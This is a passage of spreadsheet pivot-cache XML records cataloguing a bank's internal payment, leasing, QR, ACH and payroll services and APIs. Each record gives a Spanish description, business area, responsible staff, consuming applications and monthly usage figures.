    <s v="No Aplica"/>
    <s v="Pago De Facturas"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Registrar el pago de una factura en el sistema de recaudos, incluyendo consulta del convenio del recaudador, validaciones de referencia y consulta del monto de una factura, sin importar donde se encuentra la información del valor (base de datos interna o externa)."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Recaudos"/>
    <s v="Walter Andrés Gómez"/>
    <m/>
    <s v="Finacle Ent._Recaudos - Colombia_AW1065001"/>
    <s v="SAI _x000d__x000a_PAC _x000d__x000a_SCI _x000d__x000a_CNB _x000d__x000a_ALM _x000d__x000a_SVP _x000d__x000a_ALL _x000d__x000a_GDE _x000d__x000a_APP _x000d__x000a_PSE _x000d__x000a_SVE _x000d__x000a_ATM _x000d__x000a_AUD _x000d__x000a_FAC _x000d__x000a_AW0360"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Pago Factura"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Servicio que permite pagar facturas inscritas debitando el dinero de la cuenta, realiza la afectación en tiempo real del saldo del cliente. Adicionalmente permite actualizar el valor a pagar de la factura si esta no tiene validación de base de datos._x005f_x000D_ Verifica la pertenencia de la cuenta, adicionalmente también permite validar y actualizar de ser necesario la personalización de topes, límites de pagos a terceros, límites de transferencias."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Recaudos"/>
    <s v="Walter Andrés Gómez"/>
    <m/>
    <m/>
    <s v="No Tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Pago Prestamos"/>
    <n v="200"/>
    <s v="No Aplica"/>
    <s v="El servicio permite realizar el pagos de créditos comerciales, enviando al TEF3 de la transacción 001, la cuenta, el tipo de cuenta y el valor del préstamo de cliente para aplicar su pago, retornando el número de pagaré."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="STI - Sistema Transaccional de Integración_Sistema Transaccional de Integración_ISSTI0002"/>
    <s v="AW1170 _x000d__x000a_AW0955 _x000d__x000a_AW0955001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Pago Prestamos"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Transacción encargada de realizar pagos de Préstamos, está en la capacidad de realizar pagos totales, parciales o cuota. La transacción realiza el débito a la cuenta origen y realiza el pago del préstamo, en caso de algún fallo en la misma, realiza el reverso del débito, la transacción verifica que la cuenta origen para realizar el débito."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No Tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Pago Tarjeta Credito"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Pago Tarjeta Crédito tiene como objetivo permitir el pago (pago mínimo, pago total y otro valor) de tarjetas de crédito propias y no propias en dólares y pesos."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <s v="Medios de pago Aceptacion"/>
    <s v="Productor"/>
    <s v="Servicios Transaccionales MP"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="No Tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-11-10T16:28:57"/>
    <s v="Party Authentication"/>
    <n v="100"/>
    <s v="Party Authentication - Password Management"/>
    <n v="100"/>
    <s v="party-authentication-password-management"/>
    <s v="Permite la gestión, administración y consultas que se puedan realizar sobre la clave Banco o primera clave del cliente. "/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Distribución Digital"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="GestionClaveCliente/V1.0"/>
    <m/>
    <s v="AppInversiones_AW1185001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ MascaraTransaccional_NU0021001"/>
    <n v="10360"/>
    <n v="19388"/>
    <n v="35277"/>
    <n v="27024"/>
    <n v="25480"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-05-28T18:14:52"/>
    <s v="Payment Execution"/>
    <n v="101"/>
    <s v="Payment Execution - Payments"/>
    <n v="101"/>
    <s v="payment-execution-payments"/>
    <s v="La API Payment Execution - Payments tiene el objetivo de realizar la consulta general y detallada del histórico de lotes de pagos, que ha realizado una empresa afiliada a sus beneficiarios (proveedor o empleado)."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <s v="Doreley Estrada Ramirez"/>
    <m/>
    <m/>
    <s v="EDPYME_AW1170 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ Horus_AW1258011"/>
    <n v="32658"/>
    <n v="31144"/>
    <n v="28657"/>
    <n v="30336"/>
    <n v="32350"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-04-26T18:12:26"/>
    <s v="Consumer Loan Sufi"/>
    <n v="100"/>
    <s v="Payment Information"/>
    <n v="100"/>
    <s v="payment-information"/>
    <s v="El API es la interfaz de un servicio de composición entre los servicios de datos del cliente y de la consulta básica de obligaciones, que permite obtener los datos necesarios para que un cliente de Sufi pueda consultar los datos de sus próximos pagos a realizar desde una lí­nea telefónica bajo la tecnologí­a de respuesta de voz interactiva (IVR), este servicio de tarea se hace bajo el contexto del proveedor del Konecta."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <s v="SUFI"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <n v="11447"/>
    <n v="9866"/>
    <n v="7230"/>
    <n v="13518"/>
    <n v="13750"/>
    <x v="4"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-08-17T19:23:24"/>
    <s v="Payment Leasing"/>
    <n v="130"/>
    <s v="Payment Leasing - Information"/>
    <n v="130"/>
    <s v="payment-leasing-information"/>
    <s v="La API Payment Leasing - Information permitirá a los consumidores realizar la consulta de los Planes de pagos de una operación especí­fica y obtener la información correspondiente del pago al dí­a de hoy, próximo pago  a vencerse o los pagos vencidos asociados a una obligación de Leasing (Financiero, Arrendamiento Operativo u otro)."/>
    <s v="LEASING"/>
    <s v="Leasing"/>
    <s v="Leasing"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v=""/>
    <m/>
    <s v="SVETDL_AW0360006 _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ TransaccionPago_AW0360006 _x000d__x000a_ Monitoreo_Payment_Leasing _x000d__x000a_ Monitoreo_Payment_Leasing _x000d__x000a_ ModuloSVELeasing_AW0360006"/>
    <n v="14994"/>
    <n v="12006"/>
    <n v="10892"/>
    <n v="12934"/>
    <n v="14285"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-05-24T18:15:08"/>
    <s v="Payment Leasing"/>
    <n v="130"/>
    <s v="Payment Leasing - Payment Management"/>
    <n v="100"/>
    <s v="payment-leasing-payment-management"/>
    <s v="Este servicio permite realizar la gestión de un pago de Leasing , la aplicación de un pago y la gestión de transacción necesaria para un pago."/>
    <s v="LEASING"/>
    <s v="Leasing"/>
    <s v="Leasing"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="SVETDL_AW0360006 _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ TransaccionPago_AW0360006 _x000d__x000a_ Monitoreo_Payment_Leasing _x000d__x000a_ Monitoreo_Payment_Leasing _x000d__x000a_ ModuloSVELeasing_AW0360006"/>
    <m/>
    <m/>
    <m/>
    <n v="16"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-05-24T18:15:08"/>
    <s v="Payment Leasing"/>
    <n v="130"/>
    <s v="Payment Leasing - Payment Transaction Leasing"/>
    <n v="100"/>
    <s v="payment-leasing-payment-transaction-leasing"/>
    <s v="Este servicio permite realizar la gestión de transacción de un pago completo, desde el débito de una cuenta Banco de un cliente, anulación y aplicación de pagos en el core de Delfin."/>
    <s v="LEASING"/>
    <s v="Leasing"/>
    <s v="Leasing"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="SVETDL_AW0360006 _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ TransaccionPago_AW0360006 _x000d__x000a_ Monitoreo_Payment_Leasing _x000d__x000a_ Monitoreo_Payment_Leasing _x000d__x000a_ ModuloSVELeasing_AW0360006"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-05-24T18:15:08"/>
    <s v="Payment Leasing"/>
    <n v="130"/>
    <s v="Payment Leasing - Retrieve Payments Condition"/>
    <n v="100"/>
    <s v="payment-leasing-retrieve-payments-condition"/>
    <s v="Esta API cuenta con la consulta de condiciones de pago en una operación leasing"/>
    <s v="LEASING"/>
    <s v="Leasing"/>
    <s v="Leasing"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="SVETDL_AW0360006 _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ TransaccionPago_AW0360006 _x000d__x000a_ Monitoreo_Payment_Leasing _x000d__x000a_ Monitoreo_Payment_Leasing _x000d__x000a_ ModuloSVELeasing_AW0360006"/>
    <m/>
    <m/>
    <m/>
    <n v="22"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-02-17T10:52:11"/>
    <s v="Payment Order"/>
    <n v="100"/>
    <s v="Payment Order - Payment file"/>
    <n v="100"/>
    <s v="payment-order-payment-file"/>
    <s v="El API Payment Order - Payment file tiene el objetivo de realizar la notificación al proveedor pagos, para informarle que tiene un archivo de lotes en una ruta Ifs, para que él la pueda tomar y posteriormente puede realizar la ejecución del archivo en lote."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <s v="Doreley Estrada Ramirez"/>
    <m/>
    <m/>
    <s v="EDPYME_AW1170 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ Horus_AW1258011"/>
    <n v="828"/>
    <n v="965"/>
    <n v="956"/>
    <n v="994"/>
    <n v="1178"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-08-17T20:48:51"/>
    <s v="Payment Request"/>
    <n v="120"/>
    <s v="Payment Request - Batch Information"/>
    <n v="101"/>
    <s v="payment-request-batch-information"/>
    <s v="El API Payment Request - Batch information permitirá conocer la información de los lotes cargados por un cliente pagado, con diferentes opciones de filtro que facilitan la busqueda."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <s v="Doreley Estrada Ramirez"/>
    <s v="ConsultaLotesDePago/V1.0"/>
    <m/>
    <s v="APP_PRODUCTORCONSUMIDOR _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ SVE_NU0153001 _x000d__x000a_ APIJ_PRODUCTORCONSUMIDOR _x000d__x000a_ Pruebajason _x000d__x000a_ Horus_AW1258011"/>
    <m/>
    <n v="6"/>
    <m/>
    <n v="11"/>
    <n v="7"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-11-22T18:29:48"/>
    <s v="Payment Request"/>
    <n v="120"/>
    <s v="Payment Request - Management"/>
    <n v="101"/>
    <s v="payment-request-management"/>
    <s v="El API Payment Request - Management permitirá realizar la gestión de los pagos al momento de su creación y posterior al pago, realizar acciones como anulaciones o reaplicación de pagos que tuvieron inconvenientes en el proceso. Tambien permitira procesar dispersion de pagos (Procesamiento de lotes de pago)"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <s v="Doreley Estrada Ramirez"/>
    <s v="GestionDePagos/V1.0"/>
    <m/>
    <s v="APP_PRODUCTORCONSUMIDOR _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ SVE_NU0153001 _x000d__x000a_ APIJ_PRODUCTORCONSUMIDOR _x000d__x000a_ Pruebajason _x000d__x000a_ Horus_AW1258011"/>
    <n v="14"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-07-07T18:26:17"/>
    <s v="Payment Request"/>
    <n v="120"/>
    <s v="Payment Request - Payments Information"/>
    <n v="100"/>
    <s v="payment-request-payment-information"/>
    <s v="Este Produto API permite realizar la consulta de todos los pagos en el sistema de pagos."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <s v="Doreley Estrada Ramirez"/>
    <s v="ConsultaDePagos/V1.0"/>
    <m/>
    <s v="APP_PRODUCTORCONSUMIDOR _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ SVE_NU0153001 _x000d__x000a_ APIJ_PRODUCTORCONSUMIDOR _x000d__x000a_ Pruebajason _x000d__x000a_ Horus_AW1258011"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-09-30T18:10:13"/>
    <s v="payment_Initiation"/>
    <n v="100"/>
    <s v="Payments - QR Codes Management"/>
    <n v="200"/>
    <s v="payments-qr-codes-management"/>
    <s v="El api Payments - QR Codes Management permite generar un código QR (código, no imagen) que se puede utilizar para recaudos (diferente al QR que se genera en la APP para transferencias P2P). Adicionalmente se puede consultar la información de los QR generados por un comercio y la información de un QR en especí­fico.  El proveedor de este servicio es Todo1."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Transferencias y Recargas"/>
    <m/>
    <m/>
    <m/>
    <s v="MonitoreoDCM_NU0084001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-02-02T22:29:54"/>
    <s v="Payments"/>
    <n v="230"/>
    <s v="Payments - QR Management"/>
    <n v="211"/>
    <s v="payments-qr-management"/>
    <s v="El api Payments - QR Management permite generar un QR que se puede utilizar para recaudos (diferente al QR que se genera en la APP para transferencias P2P), dando la opción de generar una notificación adicional al momento del pago (diferente a las notificaciones por defecto de Aletas y Notificaciones). Adicionalmente permite solicita el enví­o fí­sico de un QR (en hablador), consultar la información de los QR generados por un comercio y la información de un QR en especí­fico."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <s v="Doreley Estrada Ramirez"/>
    <s v=""/>
    <m/>
    <s v="GestionaNegocios_AW1302001 _x000d__x000a_ GestorCanal_NU0014001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ Gestiona_AW1302001 _x000d__x000a_ Nequi_AW1011 _x000d__x000a_ Portal Contenidos Bancolombia_AW1218001 _x000d__x000a_ ALM_AW0955001 _x000d__x000a_ HabitatAdministraciones_NU0113001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ One Click Payment_NU0199001 _x000d__x000a_ Payments_AW0012345 _x000d__x000a_ APP-PERSONAS_NU0146001"/>
    <n v="2397083"/>
    <n v="2134619"/>
    <n v="2295891"/>
    <n v="2492574"/>
    <n v="3209852"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-02-02T22:29:54"/>
    <s v="Payments"/>
    <n v="230"/>
    <s v="Payments - QR Payment"/>
    <n v="113"/>
    <s v="payments-qr-payment"/>
    <s v="No tiene Descipcion"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <s v="Doreley Estrada Ramirez"/>
    <m/>
    <m/>
    <s v="GestionaNegocios_AW1302001 _x000d__x000a_ GestorCanal_NU0014001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ Gestiona_AW1302001 _x000d__x000a_ Nequi_AW1011 _x000d__x000a_ Portal Contenidos Bancolombia_AW1218001 _x000d__x000a_ ALM_AW0955001 _x000d__x000a_ HabitatAdministraciones_NU0113001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ One Click Payment_NU0199001 _x000d__x000a_ Payments_AW0012345 _x000d__x000a_ APP-PERSONAS_NU0146001"/>
    <n v="1463983"/>
    <n v="1734292"/>
    <n v="1909018"/>
    <n v="2036438"/>
    <n v="2549187"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-02-02T22:29:54"/>
    <s v="Payments"/>
    <n v="230"/>
    <s v="Payments - Transaction Logs Management"/>
    <n v="208"/>
    <s v="payments-bancolombia-logs-management"/>
    <s v="El api Payments - Transaction Logs Management permite grabar y consultar la información relacionada con las transacciones realizadas por los clientes en los diferentes servicios de aceptación de medios de pago."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <s v="Doreley Estrada Ramirez"/>
    <s v=""/>
    <m/>
    <s v="GestionaNegocios_AW1302001 _x000d__x000a_ GestorCanal_NU0014001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ Gestiona_AW1302001 _x000d__x000a_ Nequi_AW1011 _x000d__x000a_ Portal Contenidos Bancolombia_AW1218001 _x000d__x000a_ ALM_AW0955001 _x000d__x000a_ HabitatAdministraciones_NU0113001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ One Click Payment_NU0199001 _x000d__x000a_ Payments_AW0012345 _x000d__x000a_ APP-PERSONAS_NU0146001"/>
    <n v="10150"/>
    <n v="9127"/>
    <n v="7619"/>
    <n v="16554"/>
    <n v="24847"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-02-02T22:29:54"/>
    <s v="Payments"/>
    <n v="230"/>
    <s v="Payments - Transfer"/>
    <n v="100"/>
    <s v="payments-transfer"/>
    <s v="Payments - Transfer, permite realizar una transferencia entre cuentas o la anulación de la misma, dicha transferencia se comporta como un pago, tiene en cuenta temas como comisiones, reporterí­a, balance, información de la venta, y del producto"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <s v="Doreley Estrada Ramirez"/>
    <m/>
    <m/>
    <s v="GestionaNegocios_AW1302001 _x000d__x000a_ GestorCanal_NU0014001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ Gestiona_AW1302001 _x000d__x000a_ Nequi_AW1011 _x000d__x000a_ Portal Contenidos Bancolombia_AW1218001 _x000d__x000a_ ALM_AW0955001 _x000d__x000a_ HabitatAdministraciones_NU0113001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ One Click Payment_NU0199001 _x000d__x000a_ Payments_AW0012345 _x000d__x000a_ APP-PERSONAS_NU0146001"/>
    <m/>
    <m/>
    <m/>
    <n v="167"/>
    <n v="24904"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-02-11T17:01:57"/>
    <s v="Payments ACH Fulfillment"/>
    <n v="201"/>
    <s v="Payments ACH Fulfillment - Customer Enrollment"/>
    <n v="201"/>
    <s v="payments-ach-fulfillment-customer-enrollment"/>
    <s v="El API permite vincultar y desvincular las cuentas activas de ahorro y corriente del cliente Bancolombia con el níºmero de celular para realizar las transferencias Inmediatas en ACH en Lí­nea. Tambien permite consultar las cuentas vinculadas de un cliente con un numero de celular."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Transferencias y Recargas"/>
    <m/>
    <m/>
    <m/>
    <s v="MascaraTransaccional_NU0021001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-02-11T17:01:57"/>
    <s v="Payments ACH Fulfillment"/>
    <n v="201"/>
    <s v="Payments ACH Fulfillment - Transfer Management"/>
    <n v="201"/>
    <s v="payments-ach-fulfillment-transfer-management"/>
    <s v="El API permite realizar las siguientes operaciones de (Envió, recibo y solicitud dinero) de forma inmediata para realizar transferencias en lí­nea a cuentas Bancolombia y otros bancos"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Transferencias y Recargas"/>
    <m/>
    <m/>
    <m/>
    <s v="MascaraTransaccional_NU0021001"/>
    <m/>
    <m/>
    <n v="722"/>
    <n v="303"/>
    <n v="317"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-02-25T16:33:28"/>
    <s v="Employee Payroll"/>
    <n v="100"/>
    <s v="Payroll - Customer"/>
    <n v="100"/>
    <s v="payroll-customer"/>
    <s v="La Api Employee payroll - Payroll customer permite a las pequeí±as y grandes empresas, realizar su inscripción de cliente (persona natural o jurí­dica) al servicio de pago de nómina. Lo anterior con el fin de tener el registro de dicho cliente en el sistema de pagos para que posteriormente el cliente pueda realizar el pago de su nómina. Este servicio también permite consultar si el cliente se encuentra registrado en pago de nómina."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <s v="Doreley Estrada Ramirez"/>
    <m/>
    <m/>
    <s v="EDPYME_AW1170 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ JornadaDepositos_NU0170001"/>
    <n v="19235"/>
    <n v="18368"/>
    <n v="16361"/>
    <n v="17012"/>
    <n v="18560"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-07-06T11:29:41"/>
    <s v="Payroll Agreement"/>
    <n v="100"/>
    <s v="Payroll Agreement - Information"/>
    <n v="100"/>
    <s v="payroll-agreement-information"/>
    <s v="El API Payroll Agreement - Information permitirá listar la información de los convenios de nómina a partir del empleador, pagador o beneficiario. Como resultado de la consulta se obtendrá información del plan, estado grupo y porcentaje de cobro que asume el empleador en la cuota de manejo "/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <s v="Doreley Estrada Ramirez"/>
    <m/>
    <m/>
    <s v="APP_PRODUCTORCONSUMIDOR _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ JornadaDepositos_NU0170001"/>
    <m/>
    <n v="7573"/>
    <n v="1404"/>
    <n v="4531"/>
    <n v="19991"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-06-28T18:18:38"/>
    <s v="Payroll And Supplier Payment"/>
    <n v="101"/>
    <s v="Payroll And Supplier Payment - Payers"/>
    <n v="101"/>
    <s v="payroll-and-supplier-payment-payers"/>
    <s v="El Payroll And Supplier Payment - Payers permite realizar la gestión con la información de los clientes pagadores"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <s v="Doreley Estrada Ramirez"/>
    <s v="GestionClientePagador/V1.0"/>
    <m/>
    <s v="APP_PRODUCTORCONSUMIDOR _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ pruebacaida _x000d__x000a_ Pruebajason _x000d__x000a_ APIJ_PRODUCTORCONSUMIDOR"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <n v="22"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-06-28T18:18:38"/>
    <s v="Payroll And Supplier Payment"/>
    <n v="101"/>
    <s v="Payroll And Supplier Payment-Beneficiaries"/>
    <n v="110"/>
    <s v="payroll-and-supplier-payment-beneficiaries"/>
    <s v="El API Payroll and Supplier Payment - Beneficieries permitirá realizar la gestión sobre los beneficiarios de los pagadores, podrán realizar procesos de inscripción de beneficiarios y consultas, pueden ser beneficiario con cuenta en el banco u otras entidades, para pagos por lotes. Esté aplica para los recaudadores que prefieren por seguridad realizar pagos a beneficiarios ya inscritos, en caso de no estar inscrito el pago se rechazará"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <s v="Doreley Estrada Ramirez"/>
    <s v="GestionBeneficiario/V1.0"/>
    <m/>
    <s v="APP_PRODUCTORCONSUMIDOR _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ pruebacaida _x000d__x000a_ Pruebajason _x000d__x000a_ APIJ_PRODUCTORCONSUMIDOR"/>
    <m/>
    <m/>
    <m/>
    <n v="5"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-06-03T15:33:34"/>
    <s v="Payroll Management"/>
    <n v="124"/>
    <s v="Payroll Management - Companies"/>
    <n v="104"/>
    <s v="payroll-management-companies"/>
    <s v="API que permite la gestión de las empresas en el producto de gestion nomina. Inicialmente las empresas se podran consultar y actualizar. La creación de esta entidad se realiza automaticamente con el API de enrolamiento al producto."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Transversales no iSeries"/>
    <s v="Otras Funciones de Apoyo"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <m/>
    <s v="nomina app"/>
    <s v="EDPYME_AW1170 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="178"/>
    <n v="181"/>
    <n v="1721"/>
    <n v="3182"/>
    <n v="4031"/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-03-18T20:29:09"/>
    <s v="Payroll Management"/>
    <n v="124"/>
    <s v="Payroll Management - Contracts and wages of employees"/>
    <n v="102"/>
    <s v="payroll-management-contracts-and-wages-of-employees"/>
    <s v="Gestión de contratos y salarios de los empleados de la empresa, con esta API se pueden crear, consultar, modificar y eliminar contratos y salarios de empleados en el producto de gestión de nómina, los empleados están relacionados con una empresa, uno o varios contratos y salarios."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Transversales no iSeries"/>
    <s v="Otras Funciones de Apoyo"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <m/>
    <s v="nomina app"/>
    <s v="EDPYME_AW1170 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="3"/>
    <n v="8"/>
    <n v="899"/>
    <n v="1514"/>
    <n v="2345"/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-03-18T20:29:09"/>
    <s v="Payroll Management"/>
    <n v="124"/>
    <s v="Payroll Management - Contracts settlement"/>
    <n v="102"/>
    <s v="payroll-management-contracts-settlement"/>
    <s v="Gestión de liquidación definitiva de contratos de empleados, la liquidación consiste en terminar la relación laboral con un empleado, esto solo aplica para  EMPLEADOS y PENSIONADOS, los otros contratos se pueden terminar pero las personas no son liquidadas."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Transversales no iSeries"/>
